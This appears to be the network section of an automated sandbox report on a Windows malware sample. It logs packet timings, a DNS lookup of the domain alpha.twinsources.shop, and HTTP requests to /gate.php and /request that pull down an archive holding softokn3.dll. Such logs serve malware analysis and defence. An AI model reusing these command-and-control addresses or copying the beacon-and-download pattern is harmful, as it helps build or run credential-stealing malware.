Nov 20, 2023 05:21:14.048165083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.048180103 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.049361944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.049415112 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.071501017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.071556091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.071588039 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.071602106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.073199034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.073237896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.073266029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.073282957 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.074451923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.074529886 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.075774908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.075831890 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.076100111 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.076149940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.077425957 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.077446938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.077476025 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.077491999 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.077841043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.077897072 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.080061913 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.080089092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.080121040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.080154896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.080862045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.080909014 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.081789017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.081809998 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.081835032 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.081861019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.083465099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.083525896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.083865881 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.083915949 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.084302902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.084336996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.084347010 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.084383011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.087754965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.087790012 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.087806940 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.087830067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.088548899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.088582993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.088604927 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.088619947 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.091200113 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.091268063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.092436075 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.092493057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.092833042 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.092884064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.096422911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.096478939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.102793932 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.102853060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.103192091 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.103245974 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.104017973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.104072094 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.104075909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.104121923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.107892990 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.107949018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.109194040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.109257936 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.114464045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.114504099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.114629984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.116673946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.116733074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.117937088 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.117993116 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.121745110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.121826887 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.121845007 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.121872902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.122744083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.122797966 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.123020887 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.123076916 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.123882055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.123936892 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.128467083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.128506899 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.128525019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.128551960 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.129298925 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.129345894 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.131047010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.131100893 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.133166075 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.133344889 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.134398937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.134437084 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.134464979 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.134500027 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.136914015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.136966944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.141330004 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.141371012 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.141457081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.141457081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.142930984 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.142971039 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.142997980 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.143012047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.144249916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.144290924 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.144325972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.144388914 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.146877050 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.146958113 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.148176908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.148282051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.151271105 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.151305914 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.151350975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.151375055 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.158327103 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.158348083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.158400059 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.160032034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.160099983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.160439014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.160456896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.160520077 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.161319017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.161381006 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.162098885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.162169933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.163827896 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.163955927 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.165136099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.165175915 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.165260077 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.167248011 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.167285919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.167313099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.167349100 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.168108940 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.168138027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.168169975 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.168190002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.169816017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.169861078 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.169876099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.169909000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.170172930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.170228004 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.172732115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.172753096 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.172791958 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.172807932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.173094988 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.173146963 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.176850080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.176867962 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.176914930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.179375887 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.179442883 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.183634996 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.183742046 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.184082985 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.184123993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.184149027 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.184176922 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.184900999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.184964895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.187891006 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.187930107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.187958956 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.187983990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.200103998 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.200138092 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.200200081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.200217962 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.201647043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.201713085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.203102112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.203195095 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.206008911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.206027031 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.206077099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.208884001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.208904028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.208942890 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.209649086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.209672928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.209703922 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.209736109 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.210980892 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.211034060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.213485956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.213566065 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.213874102 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.213938951 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.219501972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.219571114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.219934940 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.220016003 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.223932028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.224014997 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.224240065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.224261045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.224297047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.224319935 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.232609987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.232722998 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.233491898 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.233581066 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.234762907 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.234824896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.237355947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.237421989 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.239053965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.239115000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.240739107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.240801096 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.241571903 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.241633892 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.241997957 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.242057085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.243308067 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.243361950 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.244606972 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.244678974 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.245028973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.245076895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.247158051 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.247212887 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.249942064 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.249958992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.250014067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.250081062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.250112057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.250124931 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.251812935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.251831055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.251864910 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.251889944 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.260775089 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.260835886 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.260852098 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.260904074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.261218071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.261275053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.261292934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.261343002 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.264550924 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.264621019 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.265233040 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.265271902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.265300035 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.265356064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.265965939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.265991926 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.266020060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.266035080 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.268884897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.268942118 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.274193048 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.274257898 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.276835918 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.276901960 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.283076048 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.283195972 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.290745020 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.290857077 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.294075012 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.294133902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.294434071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.294488907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:16.526065111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:16.526187897 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:16.752337933 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:16.752567053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:16.969480991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:16.969795942 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:17.208991051 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:17.209099054 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:17.404786110 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:17.460087061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:17.460155964 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:19.915714025 CET	49731	80	192.168.2.4	179.43.170.230

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2023 05:21:10.454567909 CET	52852	53	192.168.2.4	1.1.1.1
Nov 20, 2023 05:21:10.780844927 CET	53	52852	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2023 05:21:10.454567909 CET	192.168.2.4	1.1.1.1	0xe754	Standard query (0)	alpha.twinsources.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2023 05:21:10.780844927 CET	1.1.1.1	192.168.2.4	0xe754	No error (0)	alpha.twinsources.shop		179.43.170.230	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

alpha.twinsources.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49731	179.43.170.230	80	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2023 05:21:10.998145103 CET	0	OUT	GET /gate.php HTTP/1.1 Host: alpha.twinsources.shop Connection: Keep-Alive Cache-Control: no-cache
Nov 20, 2023 05:21:11.234833956 CET	1	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/8.2.11 set-cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache content-type: text/html; charset=UTF-8 content-length: 28 date: Mon, 20 Nov 2023 04:21:11 GMT server: LiteSpeed Data Raw: 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 56 78 52 47 78 51 64 56 5a 4c 62 31 4a 38 Data Ascii: MXwxfDF8MXwxfDVxRGxQdVZLb1J8
Nov 20, 2023 05:21:11.553064108 CET	1	OUT	GET /request HTTP/1.1 Host: alpha.twinsources.shop Cache-Control: no-cache Cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45
Nov 20, 2023 05:21:11.743609905 CET	1	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 last-modified: Mon, 21 Feb 2022 16:34:00 GMT accept-ranges: bytes content-length: 1565849 date: Mon, 20 Nov 2023 04:21:11 GMT server: LiteSpeed
Nov 20, 2023 05:21:11.743663073 CET	2	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkM
Nov 20, 2023 05:21:11.743680000 CET	4	IN	Data Raw: dc 0c 65 a3 ed 5b 95 6a 2c c4 2d 34 f9 12 33 51 db e9 dd 70 74 aa be 44 6e 35 96 c8 bf a6 98 08 6a a5 05 9d 4a d1 0b 92 8c 15 fb 5f 29 c8 15 23 e4 71 0a d2 63 dc 85 d6 a6 18 8d ef a7 77 a1 bb cc 38 5f d2 ed 42 b9 29 f4 2e 74 99 de 85 be b6 e9 d9 Data Ascii: e[j,-43QptDn5jJ_)#qcw8_B).tt@A^o3}yd'hct(-w`CH;)4BP`f\b51M6{6{2c8HX!;w(v#9hh[L3{66;bHV7BNSF
Nov 20, 2023 05:21:11.743696928 CET	5	IN	Data Raw: 96 56 fc 8e ce d2 a5 e4 89 16 56 4e a5 78 70 b7 3e ac db c5 21 ca 2e 5a 40 a8 e8 e5 a8 a5 b7 0a 33 cc 83 5f 28 c7 b2 34 16 a8 ce fa bb 3e 18 ac fc 8e 00 16 79 5a 2c 26 aa 14 4a f1 42 49 4d 30 10 79 74 5a 18 23 17 ba fd 3d e8 fb 16 2e 0c aa 49 59 Data Ascii: VVNxp>!.Z@3_(4>yZ,&JBIM0ytZ#=.IY58Osx06+3e3"o?c4MkwWi26miDqUq>oJ<}rRkg5\X,g-nAY\|O}u/S1];mkQ
